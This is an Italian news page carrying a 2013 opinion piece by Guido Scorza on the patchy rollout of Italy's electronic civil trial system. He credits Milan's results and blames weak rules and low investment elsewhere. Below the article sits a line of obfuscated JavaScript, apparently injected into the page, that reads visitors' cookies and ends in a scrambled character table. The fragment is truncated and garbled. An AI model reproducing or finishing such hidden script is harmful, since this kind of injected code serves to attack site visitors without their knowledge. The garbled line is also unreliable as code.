Questo sito utilizza cookie per raccogliere informazioni sull'utilizzo. Cliccando su questo banner o navigando il sito, acconsenti all'uso dei cookie. Leggi la nostra cookie policy.OK

Direttore responsabile Alessandro Longo

Processo civile telematico

Una Giustizia digitale a macchia di leopardo

di Guido Scorza

08 Lug 2013

8 luglio 2013

Leggo che a Milano il Processo civile telematico dà ormai vantaggi certi e misurabili. Bene! Peccato sia a regime in realtà solo per i decreti ingiuntivi. E Milano è una delle città che se la cava meglio, solo perché- tra l’altro- qui l’Ordine degli Avvocati ha deciso di partire subito, mettendo i propri server. 

Molti provvedimenti sono ancora in cartaceo o almeno solo in parte in digitale. I motivi? Una normativa incompleta e disorganica (un errore fondare tutto sulla Pec…), bassi investimenti pubblici nelle infrastrutture tecnologiche e nella formazione del personale. 

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}

Articoli correlati